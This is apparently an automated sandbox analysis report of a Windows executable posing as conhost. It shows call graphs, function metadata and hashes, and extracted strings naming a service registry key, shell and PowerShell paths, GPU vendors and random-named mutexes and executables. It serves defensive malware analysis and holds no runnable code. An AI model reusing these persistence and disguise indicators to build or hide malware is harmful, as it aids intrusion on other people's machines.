2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2346 2775->2355 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2379 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2379 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2379 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2379

                                        Callgraph

                                        • Executed
                                        • Not Executed
                                        • Opacity -> Relevance
                                        • Disassembly available
                                        callgraph 0 Function_00000001400062E1 1 Function_00000001400031E1 2 Function_00000001400026E1 3 Function_0000000140001AE4 38 Function_0000000140001D40 3->38 79 Function_0000000140001BA0 3->79 4 Function_00000001400014E5 75 Function_0000000140001394 4->75 5 Function_0000000140002FF0 60 Function_0000000140001370 5->60 6 Function_00000001400010F0 7 Function_00000001400065F0 8 Function_00000001400063F1 9 Function_00000001400014F4 9->75 10 Function_0000000140001800 69 Function_0000000140002290 10->69 11 Function_0000000140002500 12 Function_0000000140006400 13 Function_0000000140003200 14 Function_0000000140001E00 15 Function_0000000140001000 15->14 43 Function_0000000140001750 15->43 86 Function_0000000140001FB0 15->86 94 Function_0000000140001FC0 15->94 16 Function_0000000140006301 17 Function_0000000140001503 17->75 18 Function_0000000140001404 18->75 19 Function_0000000140002104 20 Function_0000000140006610 21 Function_0000000140001E10 22 Function_0000000140001512 22->75 23 Function_0000000140003220 24 Function_0000000140002320 25 Function_0000000140002420 26 Function_0000000140006620 26->20 27 Function_0000000140001521 27->75 28 Function_0000000140006421 29 Function_0000000140006321 30 Function_0000000140001422 30->75 31 Function_0000000140001530 31->75 32 Function_0000000140001431 32->75 33 Function_0000000140006531 34 Function_000000014000153F 34->75 35 Function_0000000140003240 35->5 35->17 35->20 35->27 35->30 35->31 35->32 35->34 36 Function_0000000140001440 35->36 49 Function_000000014000145E 35->49 52 Function_0000000140002660 35->52 56 Function_000000014000156C 35->56 57 Function_000000014000146D 35->57 35->60 64 Function_000000014000157B 35->64 77 Function_0000000140001599 35->77 83 Function_00000001400015A8 35->83 84 Function_00000001400014A9 35->84 93 Function_00000001400016C0 35->93 102 Function_00000001400027D0 35->102 106 Function_00000001400014D6 35->106 36->75 37 Function_0000000140001140 51 Function_0000000140001160 37->51 38->69 39 Function_0000000140006341 40 Function_0000000140003141 41 Function_0000000140001F47 59 Function_0000000140001870 41->59 42 Function_0000000140002050 44 Function_0000000140001650 45 Function_0000000140002751 46 Function_0000000140006451 47 Function_0000000140006551 48 Function_000000014000155D 48->75 49->75 50 Function_0000000140001760 107 Function_00000001400020E0 50->107 51->35 51->51 51->59 65 Function_0000000140001880 51->65 68 Function_0000000140001F90 51->68 51->93 53 Function_0000000140002460 54 Function_0000000140003160 55 Function_0000000140001E65 55->59 56->75 57->75 58 Function_000000014000216F 61 Function_0000000140001A70 61->38 61->79 62 Function_0000000140002770 63 Function_0000000140006371 64->75 65->25 65->38 65->52 65->79 66 Function_0000000140003180 67 Function_0000000140006481 70 Function_0000000140002590 71 Function_0000000140002790 72 Function_0000000140002691 73 Function_0000000140006391 74 Function_0000000140006591 75->26 101 Function_00000001400068D0 75->101 76 Function_0000000140002194 76->59 77->75 78 Function_000000014000219E 79->38 85 Function_00000001400023B0 79->85 100 Function_00000001400024D0 79->100 80 Function_0000000140001FA0 81 Function_00000001400027A0 82 Function_00000001400031A1 83->75 84->75 87 Function_00000001400022B0 88 Function_00000001400026B0 89 Function_00000001400027B1 90 Function_00000001400062B1 91 Function_00000001400063B1 92 Function_0000000140001AB3 92->38 92->79 95 Function_00000001400064C1 96 Function_0000000140001AC3 96->38 96->79 97 Function_00000001400014C7 97->75 98 Function_00000001400026D0 99 Function_0000000140001FD0 101->20 102->4 102->9 102->17 102->20 102->22 102->48 102->49 102->52 102->60 102->84 102->97 103 Function_00000001400017D0 104 Function_00000001400063D1 105 Function_0000000140001AD4 105->38 105->79 106->75 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                        Executed Functions

                                        Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • NtFilterToken.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: FilterToken
                                        • String ID:
                                        • API String ID: 762648202-0
                                        • Opcode ID: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                        • Instruction ID: a491f1afa2254d8e491352d0748b00eed3e2628b9b22ab978c5d7e1ef0c2ef5b
                                        • Opcode Fuzzy Hash: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                        • Instruction Fuzzy Hash: B9F09DB2608B408AEA12DF62F85179A77A1F39C7C0F009919BBC853735DB38C190CB40

                                        Non-executed Functions

                                        Function 0000000140003240 Relevance: 149.1, APIs: 60, Strings: 24, Instructions: 2059COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                        • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\hqiuerqd$\BaseNamedObjects\qtltrbgpvurodlwl$\BaseNamedObjects\ycgenmfwsowvjvqbumbspsss$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\LBFXRZGB$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe$\spvpfblnegdb\vzppfnnlsyit.exe
                                        • API String ID: 3506639089-1549105456
                                        • Opcode ID: 90db9a7731720e88522d8d38e5ea1f0388113d8381940714b474d078eb607f7e
                                        • Instruction ID: 5ef5db7b37bb24d68ff8a091b2437ffe53c7127864c5a306bdafc3344707124e
                                        • Opcode Fuzzy Hash: 90db9a7731720e88522d8d38e5ea1f0388113d8381940714b474d078eb607f7e
                                        • Instruction Fuzzy Hash: 6B5329F1924AC198F723CF3AB8557E563A0BB9E3C4F445216FB84676B2EB794285C304
                                        Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006610 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 424 140002ac7-140002afc 421->424 429 140002f7a 421->429 423 140002b03-140002b33 wcscpy wcscat wcslen 422->423 422->424 427 140002b35-140002b66 wcslen 423->427 428 140002b68-140002b95 423->428 424->423 430 140002b98-140002baf wcslen 427->430 428->430 429->423 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                        • String ID: 0$X$\BaseNamedObjects\qtltrbgpvurodlwl$`
                                        • API String ID: 780471329-4278700208
                                        • Opcode ID: 33cae6ecf3a4f6a6eaa5e8a2757f9e2d00034ac4714d2994db2ec936214c8a37
                                        • Instruction ID: 1c2136ab02bee67e58e999314ff5cb183a1ed0111dddb6ac6ef716682bc51c79
                                        • Opcode Fuzzy Hash: 33cae6ecf3a4f6a6eaa5e8a2757f9e2d00034ac4714d2994db2ec936214c8a37
                                        • Instruction Fuzzy Hash: CF126BB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                        Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                        • String ID:
                                        • API String ID: 2643109117-0
                                        • Opcode ID: 514ed7368dccedeb7f680d4cac02b15deb7491fcf34cc482be2c93d7086a4443
                                        • Instruction ID: ca612bbd05fde3f0107629a88ce93422da10278469a3e5f307c47095f5bd34e7
                                        • Opcode Fuzzy Hash: 514ed7368dccedeb7f680d4cac02b15deb7491fcf34cc482be2c93d7086a4443
                                        • Instruction Fuzzy Hash: C15121F1601A4085FB16EF27F9943EA27A1BB8CBD0F449121FB4E873B2DE3884958700
                                        Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                        • API String ID: 2595394609-2123141913
                                        • Opcode ID: 90aa3dd41f88f18f65aa9fd07c815d31b7548e95ef97d9e3e5c050fb7506a186
                                        • Instruction ID: a85250c360aa3c0d0e6a7732d6f275fb29b2c732c254969a5ce6d4d1f731ff7b
                                        • Opcode Fuzzy Hash: 90aa3dd41f88f18f65aa9fd07c815d31b7548e95ef97d9e3e5c050fb7506a186
                                        • Instruction Fuzzy Hash: 3A4132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                        Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                        • String ID:
                                        • API String ID: 3326252324-0
                                        • Opcode ID: ce66377f6fe450d63289045f16939e18676438556ef95a9d754a76f290c0f198
                                        • Instruction ID: 88ee134eb71c78e1866634492c1617bf7048d548754f0bbdfc0a648c6b94092f
                                        • Opcode Fuzzy Hash: ce66377f6fe450d63289045f16939e18676438556ef95a9d754a76f290c0f198
                                        • Instruction Fuzzy Hash: 2D21E3B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB798986C300
                                        Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bd0 553->557 561 140001f43-140001f45 554->561 562 140001f2f-140001f3f 554->562 555->554 559 140001ee4-140001ee8 555->559 556->548 558 140001ec0 556->558 557->554 566 140001f0c-140001f10 557->566 558->554 563 140001eea-140001ef9 signal 559->563 564 140001f4e-140001f53 559->564 561->548 562->561 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CCG
                                        • API String ID: 0-1584390748
                                        • Opcode ID: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                        • Instruction ID: 32d80918a5fc0d3f209f19ed34055b18f0ef7c89e2b1fcaed64eceb18b648f5f
                                        • Opcode Fuzzy Hash: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                        • Instruction Fuzzy Hash: D22139B1A0161542FA77DA2BB5903FA2192ABCC7E4F258535BF19873F5DF3888C28241
                                        Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 583 140001a20-140001a26 580->583 584 140001956-140001961 581->584 585 14000199e-1400019a6 581->585 582->581 586 14000192b-14000193a 582->586 589 140001b87-140001b98 call 140001d40 583->589 590 140001a2c-140001a37 583->590 587 140001970-14000199c call 140001ba0 584->587 585->572 588 1400019a8-1400019c1 585->588 586->579 587->585 593 1400019df-1400019e7 588->593 590->585 594 140001a3d-140001a5f 590->594 598 1400019e9-140001a0d VirtualProtect 593->598 599 1400019d0-1400019dd 593->599 595 140001a7d-140001a97 594->595 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 598->599 599->572 599->593 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->585 612->595 613->609 614->600
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
